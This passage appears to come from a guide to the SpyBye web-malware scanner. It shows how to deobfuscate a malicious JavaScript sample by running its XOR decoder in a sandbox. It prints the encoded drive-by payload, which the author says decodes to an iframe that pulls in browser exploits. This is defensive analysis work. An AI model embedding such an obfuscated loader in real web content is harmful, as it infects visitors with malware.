Exploits are often obfuscated to make it more difficult to detect nefarious activities. The reason that SpyBye is posing as a proxy server is to get your web browser to do all the decoding for us. This is not only restricted to javascript, but also applies to any other scripting languages or media decoders your browser might support, Visual Basic script, Windows Media Player, etc. Your browser is good at that, but we are not. However, when we suspect an exploit, we sometimes still need to manually investigate and deobfuscate. Take the following javascript as example:
We see that there is a quoted string and some javascript after it to decrypt it. Go over to the Web Development Bookmarklets and install jsenv as a bookmarklet. Click on the jsenv link to open up a window running the JavaScript Development Environment. Now, cut and paste the javascript from above - I introduced artificial line breaks, remove those. We also need to remove the HTML tags and replace document.write with print. The result should look like this:
e = ‘0x00’ + ‘5F’;str1 = “%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7 %BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1 %F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF %C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2”;
str=tmp=’’;for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}print(str);
Now press the execute button and see what happens:
Running in bookmarklet mode…
The iframe instructs your browser to download a plethora of exploits. Obviously, this was just a simple example. In other cases, we see double or triple wrapped javascript that results in Visual Basic script to download an executable. Or we observe an exploit against WMF to causes a malware binary to be downloaded. That is very hard for us to simulate ourselves, that’s why SpyBye uses your browser to do all the work.